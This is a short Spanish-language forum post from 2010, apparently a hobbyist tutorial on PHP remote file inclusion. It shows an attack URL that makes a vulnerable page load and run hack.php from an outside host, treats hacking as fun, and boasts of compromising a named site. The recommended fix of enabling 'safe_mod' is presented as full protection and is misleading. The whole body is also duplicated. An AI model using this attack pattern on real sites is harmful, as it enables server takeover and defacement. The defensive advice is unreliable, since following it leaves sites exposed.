23.06.2010, 18:15
Hola! les traigo este tutorial porque en el foro vi un topic que decia me han hackeado el web, bueno y esto por que es?
miremos este ejemplo:
www.asdadada.com/index.php?id=descargas
que esta haciendo ahi es incluir un archivo, pero php tiene la funcionalidad de incluir archivos externos ajenos a el servidor o internos, que pasa con esto, es que ahi estamos dejando un agujero de seguridad para que inserten cualquier otra cosa.
Yo podria hackearlo asi:
http://www.asasad.com/index.php?id=w...z.com/hack.php
entonces ejecutaria ese hack.php en la pagina victima, eso es un potencial riesgo de seguridad, por algo es uno de los hacks mas divertidos jejejeje. ese hack.php podria incluir la forma de tener el control del servidor, modificar el index de la victima, etc
Como protegerse?
Simple, en todos los hostings hay una opcion llamada safe_mod = off, bueno lo ponen en on y ya estan protegidos, en los hostings pagos nada mas, los hostings gratis no permite activar y desactivar safe_mod, asi hackee redrol xD.
Bueno espero que les guste el tuto!. Breve pero les servira.
miremos este ejemplo:
www.asdadada.com/index.php?id=descargas
que esta haciendo ahi es incluir un archivo, pero php tiene la funcionalidad de incluir archivos externos ajenos a el servidor o internos, que pasa con esto, es que ahi estamos dejando un agujero de seguridad para que inserten cualquier otra cosa.
Yo podria hackearlo asi:
http://www.asasad.com/index.php?id=w...z.com/hack.php
entonces ejecutaria ese hack.php en la pagina victima, eso es un potencial riesgo de seguridad, por algo es uno de los hacks mas divertidos jejejeje. ese hack.php podria incluir la forma de tener el control del servidor, modificar el index de la victima, etc
Como protegerse?
Simple, en todos los hostings hay una opcion llamada safe_mod = off, bueno lo ponen en on y ya estan protegidos, en los hostings pagos nada mas, los hostings gratis no permite activar y desactivar safe_mod, asi hackee redrol xD.
Bueno espero que les guste el tuto!. Breve pero les servira.
